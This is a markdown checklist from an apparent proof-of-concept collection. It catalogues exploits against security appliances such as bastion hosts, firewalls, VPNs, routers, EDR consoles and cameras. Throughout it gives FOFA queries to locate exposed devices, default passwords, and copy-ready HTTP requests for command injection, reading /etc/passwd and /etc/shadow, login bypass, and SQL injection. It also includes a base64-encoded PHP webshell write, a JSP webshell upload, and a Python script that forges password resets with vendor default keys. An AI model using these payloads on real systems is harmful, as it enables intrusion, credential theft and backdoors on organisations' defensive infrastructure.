Awesome-POC/CHECKLIST/安全设备漏洞 Checklist.md
2024-11-06 14:10:36 +08:00
# Security Device Vulnerability Checklist
Last updated: 2023.06
##### **[Disclaimer] The techniques, ideas and tools in this project are for learning only. Nobody may use them for illegal purposes or for profit, nor for unauthorized penetration testing; whoever does so bears the consequences alone, and this project is not involved. Please read the [laws and regulations](https://github.com/Threekiii/Awesome-Laws) before using this project.**
✅ marks vulnerabilities whose write-up is included in [Vulnerability-Wiki](https://github.com/Threekiii/Vulnerability-Wiki). The vulnerability library only covers some security devices from 2022/2023; the full list of IoT vulnerabilities is in [README.md](https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/iot/README.md). Further reading: [ffffffff0x/SecDevice-Exploits](https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/RedTeam/%E5%AE%89%E9%98%B2%E8%AE%BE%E5%A4%87/SecDevice-Exploits.md#%E9%BD%90%E6%B2%BB%E5%A0%A1%E5%9E%92%E6%9C%BA)
## 1. Identity and Access Control
### 0x01 Bastion Hosts
#### Qizhi (齐治) Bastion Host
FOFA
```
app="齐治科技-堡垒机"
```
##### Default credentials
```
shterm/shterm
```
##### shterm command execution via tui_update.php
```
POST /shterm/listener/tui_update.php
a=["t';import os;os.popen('whoami')#"]
```
##### Pre-auth command execution via cluster_manage.php (CNVD-2019-20835)
Accessing the following path returns ok:
```
http://10.20.10.11/listener/cluster_manage.php
```
Write a webshell:
```
/var/www/shterm/resources/qrcode/lbj77.php  (password: 10086)
```
```
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
```
##### Authenticated command execution via data_provider.php (CNVD-2019-17294)
```
POST /audit/data_provider.php?ds_y=2019&ds_m=03&ds_d=02&ds_hour=01&ds_min=40&server_cond=&service=`id`&identity_cond=&query_type=all&format=json&browse=true
Host: your-ip
page=1&rp=30&sortname=stampl&sortorder=desc&query=&qtype=
```
##### Arbitrary user login
```
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
#### H3C SecPath
FOFA
```
app="H3C-SecPath-运维审计系统" && body="2018"
```
#### Teleport Bastion Host
FOFA
```
app="TELEPORT堡垒机"
```
##### Arbitrary user login
A response with code 0 means the login succeeded; refresh the home page to enter the backend:
```
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"xxxx","oath":"","remember":false}
```
##### Authenticated file read
```
/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0
```
### 0x02 IMC
#### H3C IMC Intelligent Management Center
FOFA
```
"/imc/javax.faces.resource/images/login_logo_h3c.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
```
```
body="iMC来宾接入自助管理系统"
```
##### Remote code execution
```
POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1567
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami
```
## 2. Network Detection and Response
### 0x01 Honeypots
### 0x02 IDS
#### NSFOCUS (绿盟) UTS Comprehensive Threat Probe
##### Administrator login bypass
Enter admin with any password and click Login. Edit the response packet, changing false to true in {"status":false,...}; the response then leaks the MD5 of the admin user's password.
Log in using the MD5 value:
```
POST /webapi/v1/authen_user
{"username":"admin","password":md5}
```
### 0x03 Firewalls
#### DBAPPSecurity (安恒) 明御 Web Application Firewall
FOFA
```
app="安恒信息-明御WAF"
```
##### report.php arbitrary user login ✅
Vulnerability fingerprint:
```
/report.m?a=rpc-timed
/system.m?a=reserved
```
#### Cisco ASA
```
app="CISCO-ASA-5520"
```
##### Denial of service / sensitive information disclosure (CVE-2018-0296)
exp
- https://github.com/yassineaboukir/CVE-2018-0296
- https://github.com/milo2012/CVE-2018-0296
##### Arbitrary file deletion (CVE-2020-3187)
exp
- https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
##### Directory traversal / arbitrary file read (CVE-2020-3452)
Affected versions
```
Affected Cisco ASA versions:
<9.6.1
9.6 < 9.6.4.42
9.71
9.8 < 9.8.4.20
9.9 < 9.9.2.74
9.10 < 9.10.1.42
9.12 < 9.12.3.12
9.13 < 9.13.1.10
9.14 < 9.14.1.10
```
```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
#### H3C SecPath Next-Generation Firewall
FOFA
```
title="Web user login"
```
##### Arbitrary file download ✅
```
/webui/?g=sys_dia_data_check&file_name=../../etc/passwd
```
```
/webui/?
g=sys_capture_file_download&name=../../../../../../../../etc/passwd
```
#### Qi An Xin (奇安信) 网康 Next-Generation Firewall
FOFA
```
app="网康科技-下一代防火墙"
```
##### Remote command execution ✅
```
POST /directdata/direct/router HTTP/1.1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
```
Then access:
```
https://x.x.x.x/test_test.txt
```
#### Venustech (启明星辰) 天清汉马 USG Firewall
##### Default credentials
```
useradmin/venus.user
```
#### 佑友 (Youyou) Firewall
##### Default credentials
```
admin/hicomadmin
```
##### Authenticated command execution
```
系统管理 --> 维护工具 --> Ping
127.0.0.1|cat /etc/passwd
```
#### ZeroShell
FOFA
```
app="Zeroshell-防火墙"
```
##### ZeroShell 3.9.0 cgi-bin/kerbynet 命令执行
exp
- https://www.exploit-db.com/exploits/49096
### 0x04 Gateways
#### Qi An Xin (奇安信) 网康 NS-ASG Security Gateway
FOFA
```
网康 NS-ASG 安全网关
```
##### Arbitrary file read ✅
```
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
```
#### DBAPPSecurity (安恒) 明御 Security Gateway
##### Command execution / arbitrary file read ✅
Vulnerability fingerprint:
```
/webui/?g=aaa_portal_auth_local_submit&suffix=
/webui/?g=sys_dia_data_down&file_name=
/webui/?g=sys_dia_data_check&file_name=
...
```
#### Ruijie (锐捷) EG Gateway
##### Administrator credential disclosure ✅
Retrieve the credentials:
```
POST /login.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
username=admin&password=admin?show+webmaster+user
```
##### branch_passw.php remote command execution ✅
Send the request:
```
POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=52222egp72ilkpf2de7qbrigk3;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
pass=|cat /etc/psswd>../test_test.txt
```
Then access:
```
http://your-ip/test_test.txt
```
##### cli.php remote command execution ✅
Send the request:
```
POST /cli.php?a=shell HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 24
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=nk5erth9i0pvcco3n7fbpa9bi0;user=admin;
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
notdelay=true&command=id
```
##### download.php arbitrary file read ✅
poc
```
/download.php?a=read_txt&file=../../../../etc/passwd
```
#### Ruijie (锐捷) ISG Video Access Security Gateway
##### Credential disclosure ✅
FOFA
```
title="RG-ISG"
```
Press F12 to view the account and password in the page source; decrypt the MD5 and log in to the system.
### 0x05 Routers
#### D-Link DAP-2020
FOFA
```
body="DAP-1360" && body="6.05"
```
##### webproc arbitrary file read (CVE-2021-27250) ✅
poc
```
POST /cgi-bin/webproc
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
```
#### H3C Enterprise Routers (ER, ERG2, GR series)
##### Arbitrary user login ✅
An attacker can request the /userLogin.asp/../actionpolicy_status/../xxxx.cfg endpoint, where xxxx is the device model (for example, for model ER5200G2 the path is /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg), to bypass the cookie check through directory traversal and obtain the device's plaintext configuration file.
The configuration contains the plaintext password of the Web administrator account admin; after logging in to the backend, command execution can be obtained by enabling telnet.
#### iKuai Router
FOFA
```
title="登录爱快流控路由"
```
##### Authenticated arbitrary file read ✅
Default credentials: admin/admin
poc
```
GET /Action/download?filename=../../../../../../etc/shadow HTTP/1.1
Host
....
```
##### Flow-control router SQL injection ✅
Universal password login:
```
user: "or""=""or""="
pass: (empty)
```
#### Ruijie (锐捷) NBR Router
##### Remote command execution (CNVD-2021-09650) ✅
FOFA
```
title="锐捷网络-EWEB网管系统"
icon_hash="-692947551"
```
Construct the command execution request:
```
POST /guest_auth/guestIsUp.php
mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt
```
Then access:
```
/guest_auth/test.txt
```
### 0x06 Load Balancers
#### Citrix ADC
##### Default credentials
```
nsroot/nsroot
```
##### Remote code execution (CVE-2019-19781)
Request the following URL: a 403 response means the vulnerability is absent; if smb.conf is returned, the vulnerability is present.
```
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
```
exp
- https://github.com/trustedsec/cve-2019-19781
- https://github.com/jas502n/CVE-2019-19781
#### F5 BIG-IP
##### Remote code execution (CVE-2020-5902)
exp
- https://github.com/jas502n/CVE-2020-5902
- https://github.com/theLSA/f5-bigip-rce-cve-2020-5902
##### Remote code execution (CVE-2021-22986)
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 41
{"command":"run","utilCmdArgs":"-c id"}
```
exp
- https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP
- https://github.com/Al1ex/CVE-2021-22986
#### Topsec (天融信) Top-app LB
##### SQL injection
```
POST /acc/clsf/report/datasource.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
```
##### Passwordless login
```
username: any    password: ;id
```
### 0x07 VPN
#### Fortigate SSL VPN
FOFA
```
fofa: icon_hash="-404383634" app="FORTINET-防火墙"
```
##### Credential read (CVE-2018-13379)
exp: https://github.com/milo2012/CVE-2018-13379
##### Arbitrary password reset (CVE-2018-13382)
exp: https://github.com/milo2012/CVE-2018-13382
##### Authentication bypass (CVE-2022-40684)
exp: https://github.com/horizon3ai/CVE-2022-40684
```
git clone https://github.com/horizon3ai/CVE-2022-40684.git
cd CVE-2022-40684
ssh-keygen -t rsa
python3 CVE-2022-40684.py -t 1.1.1.1 --username admin --key-file ~/.ssh/id_rsa.pub
ssh admin@1.1.1.1
```
#### Palo Alto SSL VPN
##### GlobalProtect remote code execution (CVE-2019-1579)
exp: https://github.com/securifera/CVE-2019-1579
#### Pulse Secure SSL VPN
##### Arbitrary file read (CVE-2019-11510)
exp: https://github.com/projectzeroindia/CVE-2019-11510
##### Remote code execution (CVE-2019-11539)
exp: https://github.com/0xDezzy/CVE-2019-11539
#### Sangfor (深信服) VPN
##### Common passwords
```
admin/sangfor@123
sangfor/sangfor
test/test
test1/123456b
```
##### Password brute force
After several failed login attempts the user is asked for a captcha; entering a wrong captcha shows “校验码错误或校验码已过期” (captcha wrong or expired). Editing the login request and clearing the values of the cookie and captcha fields bypasses the captcha; the prompt then becomes “用户名或密码错误” (wrong username or password).
```
/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
```
##### SMS verification bypass
```
POST https://ip/por/changetelnum.csp?apiversion=1
newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
```
##### Arbitrary password reset
The encryption uses a default key, so an attacker who knows the key can construct a password-reset packet and change any user's password. Exploitation requires a logged-in account.
- Version M7.6.6R1: the key is 20181118
- Version M7.6.1: the key is 20100720
```
POST /por/changepwd.csp
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN  (values computed by the script)
```
```python
from Crypto.Cipher import ARC4  # pycryptodome
from binascii import a2b_hex


def myRC4(data, key):
    # RC4-encrypt the request string with the device's default key and
    # return the ciphertext as a hex string (the str= parameter)
    rc41 = ARC4.new(key)
    encrypted = rc41.encrypt(data)
    return encrypted.hex()


def rc4_decrpt_hex(data, key):
    # Reverse operation: hex-decode and RC4-decrypt a captured str= value
    rc41 = ARC4.new(key)
    return rc41.decrypt(a2b_hex(data))


key = b'20100720'
data = rb',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,'
print(myRC4(data, key))
```
#### Ruijie (锐捷) SSL VPN
FOFA
```
icon_hash="884334722" || title="Ruijie SSL VPN"
```
##### Unauthorized access
- The UserName parameter is any known username
```
GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
Cookie: UserName=admin; SessionId=1; FirstVist=1; Skin=1; tunnel=1
```
#### Juniper SSL VPN
- [Juniper SSLVPN / JunOS RCE and Multiple Vulnerabilities](https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/)
## 3. Endpoint Detection and Response
### 0x01 EDR / Antivirus
#### Sangfor (深信服) EDR
##### Command execution 1
exp: https://github.com/BH2UOL/sangfor-edr-exploit
##### Command execution 2
```
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
{"params":"w=123\"'1234123'\"|COMMAND"}
```
##### Backend arbitrary user login
```
xxx.xxx.xxx.xxx/ui/login.php?user=admin
```
#### 360天擎
FOFA
```
title="360天擎"
```
##### Unauthenticated SQL injection
```
/api/dp/rptsvcsyncpoint?ccid=1
```
##### Database information disclosure
```
http://x.x.x.x/api/dbstat/gettablessize
```
#### Kingsoft (金山) V8 Endpoint Security System
FOFA
```
title="在线安装-V8+终端安全系统Web控制台"
```
##### Arbitrary file read
```
/htmltopdf/downfile.php?filename=downfile.php
```
##### pdf_maker.php command execution
```
POST /inter/pdf_maker.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx
```
#### Kingsoft (金山) VGM Anti-Virus Gateway
FOFA
```
"金山VGM"
```
##### downFile.php arbitrary file read
poc
```
/downFile.php?filename=../../../../etc/passwd
```
### 0x02 Data Loss Prevention Systems
#### Topsec (天融信) Data Loss Prevention System
##### Unauthorized administrator password change
No login is required: the password-change function does not verify the original password, and the /?module=auth_user&action=mod_edit_pwd endpoint is reachable without authorization, so any user's password can be changed directly. The default superman account has uid 1.
```
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
```
## 4. Other
### 0x01 Network Cameras
#### Hikvision DS/IDS/IPC and similar devices
FOFA
```
"671-1e0-587ec4a1"
```
##### Remote command execution (CVE-2021-36260) ✅
```
python CVE-2021-36260.py --rhost 127.0.0.1 --rport 8081 --cmd "ls"
```
### 0x02 Integrated Management Platforms
#### Dahua (大华) Smart Park Integrated Management Platform
FOFA
```
app="dahua-智慧园区综合管理平台"
```
##### user_save.action arbitrary file upload ✅
Vulnerability fingerprint:
```
POST /admin/user_save.action
```
```
POST /WPMS/getPublicKey
```
#### Dahua (大华) City Security Surveillance System Platform Management
FOFA
```
"attachment_downloadByUrlAtt.action"
```
##### attachment_downloadByUrlAtt.action arbitrary file download ✅
poc
```
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
```
#### Hikvision iVMS-8700 Integrated Security Management Platform
FOFA
```
icon_hash="-911494769"
```
##### Arbitrary file download ✅
Verification PoC; the token is the MD5 of the URL:
```
/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1
```
##### Arbitrary file upload ✅
Send the request to upload the file:
```
POST /eps/resourceOperations/upload.action HTTP/1.1
Host:
------WebKitFormBoundaryTJyhtTNqdMNLZLhj
Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
Content-Type: image/jpeg
<%out.print("hello");%>
------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
```
Access the webshell:
```
/eps/upload/769badc8ef5944da804a4ca3c8ecafb0.jsp
```